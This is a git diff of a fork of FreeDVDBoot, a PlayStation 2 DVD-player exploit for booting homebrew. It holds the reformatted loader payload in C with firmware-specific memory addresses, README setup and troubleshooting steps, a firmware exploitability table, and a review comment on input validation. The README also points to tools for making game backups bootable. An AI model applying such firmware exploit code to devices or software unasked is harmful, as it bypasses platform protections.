diff --git a/PAYLOADS/3.03-3.11/payload.c b/PAYLOADS/3.03-3.11/payload.c index 54bab92..e85e9c7 100644 --- a/PAYLOADS/3.03-3.11/payload.c +++ b/PAYLOADS/3.03-3.11/payload.c @@ -2,7 +2,7 @@ // Pick one #define LOAD_FROM_VTS_02_0_IFO -//#define LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO (151 - 138 - 7) +// #define LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO (151 - 138 - 7) #define min(a, b) (((a) < (b)) ? (a) : (b)) 
@@ -22,181 +22,193 @@ typedef unsigned char u8; typedef unsigned short u16; typedef unsigned int u32; -typedef struct { - u8 ident[16]; - u16 type; - u16 machine; - u32 version; - u32 entry; - u32 phoff; - u32 shoff; - u32 flags; - u16 ehsize; - u16 phentsize; - u16 phnum; - u16 shentsize; - u16 shnum; - u16 shstrndx; +typedef struct +{ + u8 ident[16]; + u16 type; + u16 machine; + u32 version; + u32 entry; + u32 phoff; + u32 shoff; + u32 flags; + u16 ehsize; + u16 phentsize; + u16 phnum; + u16 shentsize; + u16 shnum; + u16 shstrndx; } elf_header_t; -typedef struct { - u32 type; - u32 offset; - void *vaddr; - u32 paddr; - u32 filesz; - u32 memsz; - u32 flags; - u32 align; +typedef struct +{ + u32 type; + u32 offset; + void *vaddr; + u32 paddr; + u32 filesz; + u32 memsz; + u32 flags; + u32 align; } elf_pheader_t; -__attribute__((noreturn)) void ExecPS2(void *entry, void *gp, int argc, char **argv) { - asm volatile("la $v1, 7; syscall 7"); - //__builtin_unreachable(); +__attribute__((noreturn)) void ExecPS2(void *entry, void *gp, int argc, char **argv) +{ + asm volatile("la $v1, 7; syscall 7"); + //__builtin_unreachable(); + // TODO: warning: `noreturn' function does return } -static void *memcpy_(void *dest, void *src, size_t n) { - int i; - for(i = 0; i < n; i++) ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; - return dest; +static void *memcpy_(void *dest, void *src, size_t n) +{ + int i; + for (i = 0; i < n; i++) + ((unsigned char *)dest)[i] = ((unsigned char *)src)[i]; + return dest; } // Todo: maybe cache last sector to save 1 or 2 reads -static void *memset(void *dest, int c, size_t n) { - int i; - for(i = 0; i < n; i++) ((unsigned char *)dest)[i] = c; - return dest; +static void *memset(void *dest, int c, size_t n) +{ + int i; + for (i = 0; i < n; i++) + ((unsigned char *)dest)[i] = c; + return dest; } -static void readData(void *dest, unsigned int offset, size_t n) { - unsigned char buffer[0x800]; - - unsigned int copied = 0; - #define remaining (n - 
copied) - - if(offset % 0x800) { - getBufferInternal("", 1, offset / 0x800, buffer, 1, 0); - memcpy_(dest, buffer + offset % 0x800, min(0x800 - (offset % 0x800), n)); - copied += min(0x800 - (offset % 0x800), n); - } - - if(remaining >= 0x800) { - getBufferInternal("", 1, (offset + copied) / 0x800, dest + copied, remaining / 0x800, 0); - copied += (remaining / 0x800) * 0x800; - } - - if(remaining > 0) { - getBufferInternal("", 1, (offset + copied) / 0x800, buffer, 1, 0); - memcpy_(dest + copied, buffer, remaining); - } +static void readData(void *dest, unsigned int offset, size_t n) +{ + unsigned char buffer[0x800]; + + unsigned int copied = 0; +#define remaining (n - copied) + + if (offset % 0x800) { + getBufferInternal("", 1, offset / 0x800, buffer, 1, 0); + memcpy_(dest, buffer + offset % 0x800, min(0x800 - (offset % 0x800), n)); + copied += min(0x800 - (offset % 0x800), n); + } + + if (remaining >= 0x800) { + getBufferInternal("", 1, (offset + copied) / 0x800, dest + copied, remaining / 0x800, 0); + copied += (remaining / 0x800) * 0x800; + } + + if (remaining > 0) { + getBufferInternal("", 1, (offset + copied) / 0x800, buffer, 1, 0); + memcpy_(dest + copied, buffer, remaining); + } } -__attribute__((noreturn)) void _start(void) { - int i; - - // Identify version based on jump target location - if((*(void **)0x928D24) == (void *)0x15ea540) { - // 3.03 - pointToIFO = (void *)0x2432c8; - getDiscData = (void *)0x243438; - - getBufferInternal = (void *)0x262360; - - SifIopReset = (void *)0x291fb8; - SifIopSync = (void *)0x292138; - SifInitRpc = (void *)0x2082a0; - SifExitRpc = (void *)0x208440; - } - else if((*(void **)0x6D9C3C) == (void *)0x126b7e0) { - // 3.04J - pointToIFO = (void *)0x23dfe0; - getDiscData = (void *)0x23e150; - - getBufferInternal = (void *)0x261560; - - SifIopReset = (void *)0x84fe0; - SifIopSync = (void *)0x85110; - SifInitRpc = (void *)0x84180; - SifExitRpc = (void *)0x84310; - } - else if((*(void **)0x95CF40) == (void *)0x1800180) { - // 
3.04M - pointToIFO = (void *)0x23dfc8; - getDiscData = (void *)0x23e138; - - getBufferInternal = (void *)0x261548; - - SifIopReset = (void *)0x291358; - SifIopSync = (void *)0x2914d8; - SifInitRpc = (void *)0x208260; - SifExitRpc = (void *)0x208400; - } - else if((*(void **)0x5f1f38) == (void *)0x1500014) { - // 3.10 - pointToIFO = (void *)0x25c880; - getDiscData = (void *)0x25c9f0; - - getBufferInternal = (void *)0x002986a0; - - SifIopReset = (void *)0x84fe0; - SifIopSync = (void *)0x85110; - SifInitRpc = (void *)0x84180; - SifExitRpc = (void *)0x84310; - } - else if((*(void **)0x3EA438) == (void *)0x1500014) { - // 3.11 - pointToIFO = (void *)0x258a28; - getDiscData = (void *) 0x258b98; - - getBufferInternal = (void *)0x2952f0; - - SifIopReset = (void *)0x20e7d8; - SifIopSync = (void *)0x20e958; - SifInitRpc = (void *)0x208d80; - SifExitRpc = (void *)0x208f20; - } - - #ifdef LOAD_FROM_VTS_02_0_IFO - // point to VTS_02_0.IFO - pointToIFO(2, 0, 0); - - // Force a read from VTS_02_0.IFO - char head[64]; - getDiscData(64, &head); - - #define RELATIVE_SECTOR 0 - #else - #define RELATIVE_SECTOR LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO - #endif - - // Based on https://github.com/AKuHAK/uLaunchELF/blob/master/loader/loader.c - elf_header_t eh; - readData(&eh, RELATIVE_SECTOR * 0x800, sizeof(elf_header_t)); - - elf_pheader_t eph[eh.phnum]; - readData(&eph, RELATIVE_SECTOR * 0x800 + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); - - for (i = 0; i < eh.phnum; i++) { - if (eph[i].type != ELF_PT_LOAD) - continue; - - readData(eph[i].vaddr, RELATIVE_SECTOR * 0x800 + eph[i].offset, eph[i].filesz); - if(eph[i].memsz > eph[i].filesz) memset(eph[i].vaddr + eph[i].filesz, 0, eph[i].memsz - eph[i].filesz); - } - - asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback - asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate - - //while(!SifIopReset("", 0)); - //while(!SifIopSync()); - - //while(!SifIopReset("rom0:UDNL 
rom0:EELOADCNF", 0)); - SifIopReset("rom0:UDNL rom0:EELOADCNF", 0); - while(!SifIopSync()); - - SifInitRpc(0); - SifExitRpc(); - - char *argv[] = { "cdrom0:\\VIDEO_TS\\VTS_02_0.IFO" }; - ExecPS2((void *)eh.entry, 0, 1, &argv); +__attribute__((noreturn)) void _start(void) +{ + int i; + + // Identify version based on jump target location + if ((*(void **)0x928D24) == (void *)0x15ea540) { + // 3.03 + pointToIFO = (void *)0x2432c8; + getDiscData = (void *)0x243438; + + getBufferInternal = (void *)0x262360; + + SifIopReset = (void *)0x291fb8; + SifIopSync = (void *)0x292138; + SifInitRpc = (void *)0x2082a0; + SifExitRpc = (void *)0x208440; + } else if ((*(void **)0x6D9C3C) == (void *)0x126b7e0) { + // 3.04J + pointToIFO = (void *)0x23dfe0; + getDiscData = (void *)0x23e150; + + getBufferInternal = (void *)0x261560; + + SifIopReset = (void *)0x84fe0; + SifIopSync = (void *)0x85110; + SifInitRpc = (void *)0x84180; + SifExitRpc = (void *)0x84310; + } else if ((*(void **)0x95CF40) == (void *)0x1800180) { + // 3.04M + pointToIFO = (void *)0x23dfc8; + getDiscData = (void *)0x23e138; + + getBufferInternal = (void *)0x261548; + + SifIopReset = (void *)0x291358; + SifIopSync = (void *)0x2914d8; + SifInitRpc = (void *)0x208260; + SifExitRpc = (void *)0x208400; + } else if ((*(void **)0x5f1f38) == (void *)0x1500014) { + // 3.10 + pointToIFO = (void *)0x25c880; + getDiscData = (void *)0x25c9f0; + + getBufferInternal = (void *)0x002986a0; + + SifIopReset = (void *)0x84fe0; + SifIopSync = (void *)0x85110; + SifInitRpc = (void *)0x84180; + SifExitRpc = (void *)0x84310; + } else if ((*(void **)0x3EA438) == (void *)0x1500014) { + // 3.11 + pointToIFO = (void *)0x258a28; + getDiscData = (void *)0x258b98; + + getBufferInternal = (void *)0x2952f0; + + SifIopReset = (void *)0x20e7d8; + SifIopSync = (void *)0x20e958; + SifInitRpc = (void *)0x208d80; + SifExitRpc = (void *)0x208f20; + } + +#ifdef LOAD_FROM_VTS_02_0_IFO + // point to VTS_02_0.IFO + pointToIFO(2, 0, 0); + + // Force a read from 
VTS_02_0.IFO + char head[64]; + getDiscData(64, &head); + +#define RELATIVE_SECTOR 0 +#else +#define RELATIVE_SECTOR LOAD_FROM_SECTOR_RELATIVE_TO_VIDEO_TS_IFO +#endif + + // Based on https://github.com/ps2homebrew/uLaunchELF/blob/master/loader/loader.c + elf_header_t eh; + readData(&eh, RELATIVE_SECTOR * 0x800, sizeof(elf_header_t)); + + elf_pheader_t eph[eh.phnum]; + readData(&eph, RELATIVE_SECTOR * 0x800 + eh.phoff, sizeof(elf_pheader_t) * eh.phnum); + + for (i = 0; i < eh.phnum; i++) { + if (eph[i].type != ELF_PT_LOAD) + continue; + + readData(eph[i].vaddr, RELATIVE_SECTOR * 0x800 + eph[i].offset, eph[i].filesz); + if (eph[i].memsz > eph[i].filesz) + memset(eph[i].vaddr + eph[i].filesz, 0, eph[i].memsz - eph[i].filesz); + } + + asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback + asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate + + // while (!SifIopReset("", 0)) + // ; + // while (!SifIopSync()) + // ; + + // while (!SifIopReset("rom0:UDNL rom0:EELOADCNF", 0)) + // ; + SifIopReset("rom0:UDNL rom0:EELOADCNF", 0); + while (!SifIopSync()) + ; + + SifInitRpc(0); + SifExitRpc(); + + char *argv[] = {"cdrom0:\\VIDEO_TS\\VTS_02_0.IFO"}; + ExecPS2((void *)eh.entry, 0, 1, &argv); + // TODO: warning: passing arg 4 of `ExecPS2' from incompatible pointer type } diff --git a/PAYLOADS/3.03-3.11/payload.elf b/PAYLOADS/3.03-3.11/payload.elf deleted file mode 100644 index adedd9e..0000000 Binary files a/PAYLOADS/3.03-3.11/payload.elf and /dev/null differ 
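Review bot: `_start` still sizes the VLA `elf_pheader_t eph[eh.phnum];` and then writes to `eph[i].vaddr` straight from an ELF header read off the disc with no validation, so a misread sector — the kind of laser problem the README troubleshooting describes — yields a garbage `phnum` that overruns the stack crt0.S points at the top of scratchpad RAM (`lui $sp, 0x7000; ori $sp, 0x4000`) and garbage load addresses that scribble over arbitrary memory. A cheap sanity check right after `readData(&eh, ...)` keeps the failure deterministic: `if (eh.ident[0] != 0x7f || eh.ident[1] != 'E' || eh.ident[2] != 'L' || eh.ident[3] != 'F' || eh.phnum == 0 || eh.phnum > 32) for (;;) ;` (spinning, since the payload has no obvious way to report an error at this point; a bounded retry of the read would be the friendlier option). The two TODOs added at the end can be resolved rather than recorded: `__builtin_unreachable();` after the `syscall 7` in `ExecPS2` silences the noreturn warning, and the final call should pass `argv` rather than `&argv` — the `char *(*)[1]` happens to carry the same address but is the wrong type for the `char **` parameter.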
diff --git a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VIDEO_TS.IFO b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VIDEO_TS.IFO similarity index 89% rename from Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VIDEO_TS.IFO rename to PAYLOADS/3.03-3.11/udf/VIDEO_TS/VIDEO_TS.IFO index 20c44ca..8d4fdb1 100644 Binary files a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VIDEO_TS.IFO and b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VIDEO_TS.IFO differ diff --git a/Filesystems/3.04M+ - English language/VIDEO_TS/VTS_01_0.IFO b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_01_0.IFO similarity index 100% rename from Filesystems/3.04M+ - English language/VIDEO_TS/VTS_01_0.IFO rename to PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_01_0.IFO diff --git a/Filesystems/3.04M+ - English language/VIDEO_TS/VTS_02_0.IFO b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_02_0.IFO similarity index 100% rename from Filesystems/3.04M+ - English language/VIDEO_TS/VTS_02_0.IFO rename to PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_02_0.IFO diff --git a/PREBUILT ISOs/3.04 only - M+maybe other regions except J - English language.iso b/PREBUILT ISOs/3.04 only - M+maybe other regions except J - English language.iso deleted file mode 100644 index 48afcb9..0000000 Binary files a/PREBUILT ISOs/3.04 only - M+maybe other regions except J - English language.iso and /dev/null differ diff --git a/PREBUILT ISOs/All PS2 Slims - English language.iso b/PREBUILT ISOs/All PS2 Slims - English language.iso deleted file mode 100644 index 0c52ecf..0000000 Binary files a/PREBUILT ISOs/All PS2 Slims - English language.iso and /dev/null differ diff --git a/README.md b/README.md index 35b08f6..4344081 100644 --- a/README.md +++ b/README.md 
@@ -1,5 +1,8 @@ # FreeDVDBoot -PlayStation 2 DVD Player Exploit. This allows you to burn your own PlayStation 2 homebrew discs and play them on an unmodified console as seen in the [demo video](https://www.youtube.com/watch?v=ez0y-hz3VuM). With uLaunchELF as the initial program, users can include multiple homebrew programs on the same disc. + +This is the fork of the [original repository](https://github.com/CTurt/FreeDVDBoot). + +PlayStation 2 DVD Player Exploit. This allows you to burn your own PlayStation 2 homebrew discs and play them on an unmodified console as seen in the [demo video](https://www.youtube.com/watch?v=ez0y-hz3VuM). With wLaunchELF as the initial program, users can include multiple homebrew programs on the same disc. For technical details please refer to my [blog post](https://cturt.github.io/freedvdboot.html). @@ -8,6 +11,7 @@ Read from [here](#easy-setup-for-all-ps2-slim-consoles--bravia-tv) if you have a Read from [here](#phat-consoles) if you have a Phat PS2. ## Easy setup for all PS2 Slim consoles / Bravia TV + All you need is: - A compatible console (all PS2 Slim / Sony Bravia TV units are supported), 
@@ -15,34 +19,39 @@ All you need is: - A computer with a built-in disc burner / external USB disc burner, ### Step 1: Download the ISO -Download [`PREBUILT ISOs/All PS2 Slims - English language.iso`](https://github.com/CTurt/FreeDVDBoot/raw/master/PREBUILT%20ISOs/All%20PS2%20Slims%20-%20English%20language.iso) + +Download [`All PS2 Slims - English language.iso`](https://github.com/ps2homebrew/FreeDVDBoot/releases/download/1.0/All.PS2.Slims.-.English.language.iso.zip) ### Step 2: Burn the ISO -Please check following to ensure a good burn which the PS2 will be able to read: + +Please check the following to ensure a good burn which the PS2 will be able to read: - Clean off any dust from the disc, -- Select lowest burning speed option, -- Select finalise disc option, +- Select the lowest burning speed option, +- Select finalize disc option, ### Step 3: Set console language to English + Your console must be set to **English language** for the exploit to work (other languages cause memory contents to change). To do this, boot without a disc inserted, press **Circle** to enter **System Configuration** and set your system language to **English**. ### Step 4: Boot! -Insert the disc into your console, and wait. It should boot into **uLaunchELF** within a few seconds. -From **uLaunchELF**, you have the ability to run any homebrew you want over USB **mass** storage! Many people choose to run **FreeMCBoot** or **Fortuna** installer, as they find booting from a memory card more convenient. +Insert the disc into your console, and wait. It should boot into **wLaunchELF** within a few seconds. -If you want to add additional homebrew to your DVD / replace uLaunchELF, please read from [Custom disc setup](#custom-disc-setup). +From **wLaunchELF**, you can run any homebrew you want over USB **mass** storage! Many people choose to run **FreeMCBoot** or **Fortuna** installer, as they find booting from a memory card more convenient. 
+ +If you want to add additional homebrew to your DVD / replace wLaunchELF, please read from [Custom disc setup](#custom-disc-setup). ## Troubleshooting - please read if the above didn't work -| Problem | Solution | + +| Problem | Solution | |------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | Disc doesn't spin on slim console | Press the lid down hard to ensure the sensors detect that the lid is closed. If still not working try placing some weight such as a book on the top of the console. | -| PS2 detects the disc as "PlayStation 2 disc" instead of "DVD Video" in the browser | Your PS2 has a modchip which is incorrectly preventing the DVD player from launching. You do not need this exploit for a console with a modchip, but if you really want to try it some modchips offer the ability to temporarily disable themselves (by holding start when booting for example). | -| PS2 displays "unable to read disc" | Please try playing a real DVD movie disc to verify that your console's DVD laser works; doing this can also recalibrate the laser which might solve the issue, as [commented here](https://github.com/CTurt/FreeDVDBoot/issues/27). Also try the following PS2 setting `Version -> Console -> Diagnosis -> On` which can assist with laser problems. | -| PS2 freezes at black/red/green screen | If your PS2 DVD laser is really worn out, or you are using something difficult to read like a dusty DVD+RW burned on high speed, it might take some time before uLaunchELF actually starts. 
Please try waiting 3 minutes or so, per [this comment](https://github.com/CTurt/FreeDVDBoot/issues/3#issuecomment-651337741) | +| PS2 detects the disc as "PlayStation 2 disc" instead of "DVD Video" in the browser | Your PS2 has a modchip that is incorrectly preventing the DVD player from launching. You do not need this exploit for a console with a modchip, but if you really want to try it some modchips offer the ability to temporarily disable themselves (by holding start when booting, for example). | +| PS2 displays "unable to read disc" | Please try playing a real DVD movie disc to verify that your console's DVD laser works; doing this can also recalibrate the laser that might solve the issue, as [commented here](https://github.com/CTurt/FreeDVDBoot/issues/27). Also try the following PS2 setting `Version -> Console -> Diagnosis -> On` which can assist with laser problems. | +| PS2 freezes at black/red/green screen | If your PS2 DVD laser is really worn out, or you are using something difficult to read as a dusty DVD+RW burned on high speed, it might take some time before wLaunchELF actually starts. Please try waiting 3 minutes or so, per [this comment](https://github.com/CTurt/FreeDVDBoot/issues/3#issuecomment-651337741) | Other suggestions that worked for others: 
@@ -59,11 +68,13 @@ Other suggestions that worked for others: **Please, only open a GitHub issue if you have read and tried all of the above. If you do open an issue, please confirm that you tried a real DVD movie and it worked on your system so that we know it's not just a laser failure; also include your DVD player version, the name of the ISO you tried, the type of DVD, and what happens when you launch the disc.** ## Phat consoles -Phat consoles have many different firmware version revisions, which makes them harder to add support for. It also means you will need to identify your firmware version, and burn the matching ISO file. -It's still early in terms of support for different versions, check back here later. Hopefully over time other developers from the scene will also contribute support for additional DVD Player versions. The new exploit for 2.10 should be possible to port to all firmwares between 1.00 - 2.13 (Sony actually patched this one in 2.14 lol). +Phat consoles have many different firmware version revisions, which makes them harder to add support for. It also means you will need to identify your firmware version and burn the matching ISO file. + +It's still early in terms of support for different versions, check back here later. Hopefully, over time other developers from the scene will also contribute support for additional DVD Player versions. The new exploit for 2.10 should be possible to port to all firmware revisions between 1.10 - 2.13 (Sony actually patched this one in 2.14 lol). ### Step 1: Identify your DVD Player Version + Boot your PlayStation 2 without any disc inserted, and press Triangle to identify which DVD Player version your console has. **Currently only support:** 
@@ -72,9 +83,10 @@ Boot your PlayStation 2 without any disc inserted, and press Triangle to identif - 2.12 (regions U, J, and G, if any other regions exist for 2.12 let me know), -- 3.04 (tested only region M in emulator so far, but guess most other regions EUMACDG, except for J will work - with English language set in settings), +- 3.04 (tested only region M in the emulator so far, but guess most other regions EUMACDG, except for J will work - with English language set in settings), ### Step 2: Download the ISO + Download the ISO that corresponds to your firmware version. **Please don't bother trying on a non-supported firmware/language configuration, it won't work...** 
@@ -82,64 +94,75 @@ Download the ISO that corresponds to your firmware version.
 For example, if your DVD Player version is 2.10J, you would want to download `PREBUILT ISOs/2.10.iso`.
 
 ### Step 3, 4, 5 - Burn the ISO, set console language to English, and boot!
+
 These steps are the same as described for slim above.
 
 ## Custom disc setup - Slim
-If you intend to make your own image containing additional homebrew / modified initial loader, please read on.
+
+If you intend to make your image containing additional homebrew / modified initial loader, please read on.
 
 ### Step 1: Copy your homebrew
+
 Once you've identified your console's DVD Player version, copy all of the homebrew you would like to include on the disc into that directory in the `Filesystems` (EG: `Filesystems/All PS2 slims (3.10 + 3.11) - English language/` is the one that supports all slim consoles).
 
 ### Step 2: Make an image
+
 Once you've placed all the homebrew files you'd like into the directory, generate a UDF (ISO9960/UDF hybrid also works) image of the directory (so `VIDEO_TS` is in the root).
 
-On Windows, you can use a GUI like ImgBurn to make an disc image. It will give a warning that `VIDEO_TS.BUP` is missing, but just click continue anyway (PS2 doesn't require this file).
+On Windows, you can use a GUI like ImgBurn to make a disc image. It will give a warning that `VIDEO_TS.BUP` is missing, but just click continue anyway (PS2 doesn't require this file).
 
-On Linux the easiest way is probably to use `genisoimage` as it comes pre-installed on many Linux distributions like Ubuntu. Run the following on terminal (where `exploit.iso` is the output and `Filesystem/All PS2 slims (3.10 + 3.11) - English language` is the directory containing `VIDEO_TS` and any homebrew):
+On Linux, the easiest way is probably to use `genisoimage` as it comes pre-installed on many Linux distributions like Ubuntu. 
Run the following on terminal (where `exploit.iso` is the output and `Filesystem/All PS2 slims (3.10 + 3.11) - English language` is the directory containing `VIDEO_TS` and any homebrew):
 
 genisoimage -udf -o exploit.iso "Filesystems/All PS2 slims (3.10 + 3.11) - English language"
 
 ### Step 3: Test and burn
-I would recommend you test in PCSX2 first, but since [PCSX2 doesn't support loading the DVD Player](https://github.com/PCSX2/pcsx2/issues/1981), you have to decrypt and repack it yourself, which is beyond the scope of this README. With that said, if you aren't touching anything in `VIDEO_TS`, there shouldn't really be any reason for the exploit to fail.
+
+I would recommend you test in PCSX2 first, but since [PCSX2 doesn't support loading the DVD Player](https://github.com/PCSX2/pcsx2/issues/1981), you have to decrypt and repack it yourself, which is beyond the scope of this README. With that said, if you aren't touching anything in `VIDEO_TS`, there shouldn't be any reason for the exploit to fail.
 
 ## Custom disc setup - Phat
-Instructions for building the phat exploit coming soon.
+
+Instructions for building the phat exploit will be coming soon.
 
 ## Replacing the initial program - Slim
-I've included uLaunchELF recompiled with [DVD support](https://github.com/ps2dev/ps2sdk/pull/130) as the default initial program. It presents a menu which allows you to select any of the homebrew programs you chose to include on the disc (and also allows booting from USB).
-Alternatively, if you would rather just boot into a single homebrew application, the initial program the exploit attempts to boot is located at `VIDEO_TS/VTS_02_0.IFO`, replace it with your desired `ELF` file, with the below caveat that compatibility might be lower than if you booted a program through uLaunchELF:
+I've included wLaunchELF recompiled with [DVD support](https://github.com/ps2dev/ps2sdk/pull/130) as the default initial program. 
It presents a menu that allows you to select any of the homebrew programs you chose to include on the disc (and also allows booting from USB).
+
+Alternatively, if you would rather just boot into a single homebrew application, the initial program the exploit attempts to boot is located at `VIDEO_TS/VTS_02_0.IFO`, replace it with your desired `ELF` file, with the below caveat that compatibility might be lower than if you booted a program through wLaunchELF:
 
 For the initial release, I didn't bother to reimplement a couple of functions used by the loader, so it requires that the ELF you load doesn't overwrite those functions I use (those are around `0x84000 - 0x85fff` and `0x250000 - 0x29ffff`). I will probably remove this limitation in the future, but all ELFs I could find were fine with this limitation. You can run `readelf -l` to verify your executable satisfies this requirement. For example, this Tetris homebrew just uses `0x00100000 - 0x0017a940`:
 
- $ readelf -l VTS_02_0.IFO
+ $ readelf -l VTS_02_0.IFO
 
- Elf file type is EXEC (Executable file)
- Entry point 0x104490
- There is 1 program header, starting at offset 52
+ Elf file type is EXEC (Executable file)
+ Entry point 0x104490
+ There is 1 program header, starting at offset 52
 
- Program Headers:
- Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
- LOAD 0x001000 0x00100000 0x00100000 0x72ef4 0x7a940 RWE 0x1000
+ Program Headers:
+ Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
+ LOAD 0x001000 0x00100000 0x00100000 0x72ef4 0x7a940 RWE 0x1000
 
- Section to Segment mapping:
- Segment Sections...
- 00 .text .ctors .dtors .rodata .data .jcr .sdata .sbss .bss
+ Section to Segment mapping:
+ Segment Sections...
+ 00 .text .ctors .dtors .rodata .data .jcr .sdata .sbss .bss
 
 ## Replacing the initial program - Phat
+
 The ELF is read from `0x5bb000` in the ISO file, copy to that location with a hex editor to replace it.
 
 ## Loading backups
+
 It's possible to patch backup images of commercial games to make them bootable using this exploit. I didn't want to maintain this tool, so it's not included in this repository, but can be found by searching for something like FreeDVDBoot ESR auto patcher.
 
 ## DEVELOPMENT: Replacing the loader payload - Slim
-The default payload will boot `VIDEO_TS/VTS_02_0.IFO` as an ELF file, but tweaks might be desired to improve compatibility, or maybe changing the behaviour to boot `BOOT.ELF` instead for instance.
+
+The default payload will boot `VIDEO_TS/VTS_02_0.IFO` as an ELF file, but tweaks might be desired to improve compatibility, or maybe changing the behavior to boot `BOOT.ELF` instead for instance.
 
 If you wish to update the loader payload, run `build.sh` inside `PAYLOAD` directory, and copy the output `.bin` files into `VIDEO_TS/VIDEO_TS.IFO` at the offsets displayed by the output of the command.
 
 ## DEVELOPMENT: Replacing the loader payload - Phat
+
 Run the following to build a new `dvd.iso`:
 
 `make -f hardware.mk`
@@ -151,4 +174,47 @@ If you want to test on PCSX2 using KrHacken's repacked DVD players, it loads `ud
 `clean` before switching between these different Makefiles, or use `-B` flag.
 
 ## PORTING:
-Please read my technical writeup, to understand how the exploit works. I've also provided some [notes about porting](https://cturt.github.io/FreeDVDBoot/portingnotes.html) in the [`gh-pages`](https://github.com/CTurt/FreeDVDBoot/tree/gh-pages) branch.
+
+Please read my technical writeup, to understand how the exploit works. I've also provided some [notes about porting](https://ps2homebrew.github.io/FreeDVDBoot/portingnotes.html) in the [`gh-pages`](https://github.com/ps2homebrew/FreeDVDBoot/tree/gh-pages) branch.
+
+## Reference table
+
+| DVDver | PS2 Model | Hackable |
+|----------|:-------------:|------:|
+| 1.10U | SCPH-30001 | t |
+| 1.20A | SCPH-30002 | ? |
+| 1.20E | SCPH-30003/4 | ? |
+| 1.20U | SCPH-30001 | ? |
+| 1.30A | SCPH-30002/35002 | ? |
+| 1.30E | SCPH-30003/4/35003/4 | ? |
+| 1.30U | SCPH-30001/35001 | ? |
+| 2.00J | SCPH-18000 | ? |
+| 2.02J | SCPH-30000/35000 | ? |
+| 2.10A | SCPH-30002 R | E |
+| 2.10E | SCPH-30003/4 R | E |
+| 2.10J | SCPH-30000 | E |
+| 2.10U | SCPH-30001 R | E |
+| 2.12G | SCPH-30006 R | E |
+| 2.12U | SCPH-39001 | E |
+| 2.13A | SCPH-39002 | t |
+| 2.13E | SCPH-39003/4 | t |
+| 2.14J | SCPH-37000 | x |
+| 2.15G | SCPH-39006 | x |
+| 2.16D | SCPH-39008 | x |
+| 2.16J | SCPH-39000 | x |
+| 3.00A | SCPH-50002 | x |
+| 3.00E | SCPH-50003/4 | x |
+| 3.00J | SCPH-5x000 | x |
+| 3.00U | SCPH-50001 | x |
+| 3.02A | SCPH-50002 | x |
+| 3.02C | SCPH-50009 | x |
+| 3.02D | SCPH-50008 | x |
+| 3.02E | SCPH-50003/4 | x |
+| 3.02G | SCPH-50005/6 | x |
+| 3.02J | SCPH-50000 | x |
+| 3.02U | SCPH-50001 | x |
+| 3.03E | SCPH-50004 | C |
+| 3.03J | SCPH-50000 | C |
+| 3.04M | SCPH-50011 | C |
+| 3.10 | SCPH-700xx | C |
+| 3.11 | SCPH-750xx/770xx/790xx/900xx/PX300 | C |
diff --git a/TODO b/TODO
new file mode 100644
index 0000000..0d7e4ee
--- /dev/null
+++ b/TODO
@@ -0,0 +1,6 @@
+Test payload in pcsx2 with the real DVDROM content, not with repacked dvd-player versions
+port 1.00-2.13 payload to all DVD FW in that range
+try to generate an iso with the mix of 2 payloads
+document more how ElReino payload is working
+fix compilation warnings
+test if generated iso files works